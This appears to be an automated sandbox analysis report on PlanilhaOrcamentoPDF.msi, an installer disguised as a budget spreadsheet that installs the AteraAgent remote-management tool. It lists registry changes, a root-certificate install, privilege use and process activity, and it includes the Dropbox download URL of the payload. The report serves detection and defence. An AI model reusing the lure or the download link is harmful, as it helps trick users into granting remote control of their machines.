Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	AteraAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption"	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	AteraAgent.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	AteraAgent.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	AteraAgent.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	AteraAgent.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	AteraAgent.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	AteraAgent.exe

Modifies registry class 23 IoCs

Processes:

msiexec.exemsedge.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7D0A237E2F2A7564CA141B792446E854\ProductName = "AteraAgent"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7D0A237E2F2A7564CA141B792446E854\Assignment = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\25F46F8180ECF4345A1FA7A8935DE9AE\7D0A237E2F2A7564CA141B792446E854	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7D0A237E2F2A7564CA141B792446E854\SourceList\Media	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7D0A237E2F2A7564CA141B792446E854\SourceList\Media\1 = ";"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7D0A237E2F2A7564CA141B792446E854\SourceList\Net	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7D0A237E2F2A7564CA141B792446E854\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings	msedge.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7D0A237E2F2A7564CA141B792446E854\Version = "17301511"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7D0A237E2F2A7564CA141B792446E854\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7D0A237E2F2A7564CA141B792446E854\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\25F46F8180ECF4345A1FA7A8935DE9AE	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7D0A237E2F2A7564CA141B792446E854\SourceList	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7D0A237E2F2A7564CA141B792446E854\PackageCode = "559DA127DF979104BB5FD9CCC41157BB"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7D0A237E2F2A7564CA141B792446E854\Language = "1033"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7D0A237E2F2A7564CA141B792446E854\AuthorizedLUAApp = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7D0A237E2F2A7564CA141B792446E854\SourceList\PackageName = "PlanilhaOrcamentoPDF.msi"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7D0A237E2F2A7564CA141B792446E854\SourceList\Net\1 = "C:\\Users\\Admin\\Downloads\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7D0A237E2F2A7564CA141B792446E854\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\Downloads\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\7D0A237E2F2A7564CA141B792446E854	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\7D0A237E2F2A7564CA141B792446E854\INSTALLFOLDER_files_Feature	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7D0A237E2F2A7564CA141B792446E854	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\7D0A237E2F2A7564CA141B792446E854\InstanceType = "0"	msiexec.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

AteraAgent.exe

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	AteraAgent.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4	AteraAgent.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	AteraAgent.exe

NTFS ADS 1 IoCs

Processes:

msedge.exe

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 544843.crdownload:SmartScreen	msedge.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exemsiexec.exeAteraAgent.exe

pid	Process
4560	msedge.exe
4560	msedge.exe
1340	msedge.exe
1340	msedge.exe
4676	identity_helper.exe
4676	identity_helper.exe
412	msedge.exe
412	msedge.exe
2760	msiexec.exe
2760	msiexec.exe
5884	AteraAgent.exe
5884	AteraAgent.exe
2760	msiexec.exe
2760	msiexec.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

Processes:

msedge.exe

pid	Process
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exemsiexec.exevssvc.exerundll32.exeTaskKill.exe

description	pid	Process
Token: SeShutdownPrivilege	5012	msiexec.exe
Token: SeIncreaseQuotaPrivilege	5012	msiexec.exe
Token: SeSecurityPrivilege	2760	msiexec.exe
Token: SeCreateTokenPrivilege	5012	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	5012	msiexec.exe
Token: SeLockMemoryPrivilege	5012	msiexec.exe
Token: SeIncreaseQuotaPrivilege	5012	msiexec.exe
Token: SeMachineAccountPrivilege	5012	msiexec.exe
Token: SeTcbPrivilege	5012	msiexec.exe
Token: SeSecurityPrivilege	5012	msiexec.exe
Token: SeTakeOwnershipPrivilege	5012	msiexec.exe
Token: SeLoadDriverPrivilege	5012	msiexec.exe
Token: SeSystemProfilePrivilege	5012	msiexec.exe
Token: SeSystemtimePrivilege	5012	msiexec.exe
Token: SeProfSingleProcessPrivilege	5012	msiexec.exe
Token: SeIncBasePriorityPrivilege	5012	msiexec.exe
Token: SeCreatePagefilePrivilege	5012	msiexec.exe
Token: SeCreatePermanentPrivilege	5012	msiexec.exe
Token: SeBackupPrivilege	5012	msiexec.exe
Token: SeRestorePrivilege	5012	msiexec.exe
Token: SeShutdownPrivilege	5012	msiexec.exe
Token: SeDebugPrivilege	5012	msiexec.exe
Token: SeAuditPrivilege	5012	msiexec.exe
Token: SeSystemEnvironmentPrivilege	5012	msiexec.exe
Token: SeChangeNotifyPrivilege	5012	msiexec.exe
Token: SeRemoteShutdownPrivilege	5012	msiexec.exe
Token: SeUndockPrivilege	5012	msiexec.exe
Token: SeSyncAgentPrivilege	5012	msiexec.exe
Token: SeEnableDelegationPrivilege	5012	msiexec.exe
Token: SeManageVolumePrivilege	5012	msiexec.exe
Token: SeImpersonatePrivilege	5012	msiexec.exe
Token: SeCreateGlobalPrivilege	5012	msiexec.exe
Token: SeBackupPrivilege	692	vssvc.exe
Token: SeRestorePrivilege	692	vssvc.exe
Token: SeAuditPrivilege	692	vssvc.exe
Token: SeBackupPrivilege	2760	msiexec.exe
Token: SeRestorePrivilege	2760	msiexec.exe
Token: SeRestorePrivilege	2760	msiexec.exe
Token: SeTakeOwnershipPrivilege	2760	msiexec.exe
Token: SeRestorePrivilege	2760	msiexec.exe
Token: SeTakeOwnershipPrivilege	2760	msiexec.exe
Token: SeRestorePrivilege	2760	msiexec.exe
Token: SeTakeOwnershipPrivilege	2760	msiexec.exe
Token: SeDebugPrivilege	5892	rundll32.exe
Token: SeRestorePrivilege	2760	msiexec.exe
Token: SeTakeOwnershipPrivilege	2760	msiexec.exe
Token: SeRestorePrivilege	2760	msiexec.exe
Token: SeTakeOwnershipPrivilege	2760	msiexec.exe
Token: SeRestorePrivilege	2760	msiexec.exe
Token: SeTakeOwnershipPrivilege	2760	msiexec.exe
Token: SeRestorePrivilege	2760	msiexec.exe
Token: SeTakeOwnershipPrivilege	2760	msiexec.exe
Token: SeRestorePrivilege	2760	msiexec.exe
Token: SeTakeOwnershipPrivilege	2760	msiexec.exe
Token: SeDebugPrivilege	3856	TaskKill.exe
Token: SeRestorePrivilege	2760	msiexec.exe
Token: SeTakeOwnershipPrivilege	2760	msiexec.exe
Token: SeRestorePrivilege	2760	msiexec.exe
Token: SeTakeOwnershipPrivilege	2760	msiexec.exe
Token: SeRestorePrivilege	2760	msiexec.exe
Token: SeTakeOwnershipPrivilege	2760	msiexec.exe
Token: SeRestorePrivilege	2760	msiexec.exe
Token: SeTakeOwnershipPrivilege	2760	msiexec.exe
Token: SeRestorePrivilege	2760	msiexec.exe

Suspicious use of FindShellTrayWindow 40 IoCs

Processes:

msedge.exemsiexec.exemsiexec.exe

pid	Process
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
5012	msiexec.exe
5012	msiexec.exe
6020	msiexec.exe
6020	msiexec.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	Process
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe
1340	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	Process	procid_target
PID 1340 wrote to memory of 3588	1340	msedge.exe	84
PID 1340 wrote to memory of 3588	1340	msedge.exe	84
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 5028	1340	msedge.exe	85
PID 1340 wrote to memory of 4560	1340	msedge.exe	86
PID 1340 wrote to memory of 4560	1340	msedge.exe	86
PID 1340 wrote to memory of 1788	1340	msedge.exe	87
PID 1340 wrote to memory of 1788	1340	msedge.exe	87
PID 1340 wrote to memory of 1788	1340	msedge.exe	87
PID 1340 wrote to memory of 1788	1340	msedge.exe	87
PID 1340 wrote to memory of 1788	1340	msedge.exe	87
PID 1340 wrote to memory of 1788	1340	msedge.exe	87
PID 1340 wrote to memory of 1788	1340	msedge.exe	87
PID 1340 wrote to memory of 1788	1340	msedge.exe	87
PID 1340 wrote to memory of 1788	1340	msedge.exe	87
PID 1340 wrote to memory of 1788	1340	msedge.exe	87
PID 1340 wrote to memory of 1788	1340	msedge.exe	87
PID 1340 wrote to memory of 1788	1340	msedge.exe	87
PID 1340 wrote to memory of 1788	1340	msedge.exe	87
PID 1340 wrote to memory of 1788	1340	msedge.exe	87
PID 1340 wrote to memory of 1788	1340	msedge.exe	87
PID 1340 wrote to memory of 1788	1340	msedge.exe	87
PID 1340 wrote to memory of 1788	1340	msedge.exe	87
PID 1340 wrote to memory of 1788	1340	msedge.exe	87
PID 1340 wrote to memory of 1788	1340	msedge.exe	87
PID 1340 wrote to memory of 1788	1340	msedge.exe	87

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://www.dropbox.com/scl/fi/zgxfzes4y09jcfjax2jd9/PlanilhaOrcamentoPDF.msi?rlkey=ijhrpa833envr6inh6gd8nsqb&st=h7ecvuvj&dl=1
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe1a8f46f8,0x7ffe1a8f4708,0x7ffe1a8f4718
  2⤵
  PID:3588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1976,14769956310318151825,14355730195979062683,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1988 /prefetch:2
  2⤵
  PID:5028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1976,14769956310318151825,14355730195979062683,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2484 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4560
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1976,14769956310318151825,14355730195979062683,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8
  2⤵
  PID:1788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1976,14769956310318151825,14355730195979062683,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
  2⤵
  PID:2852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
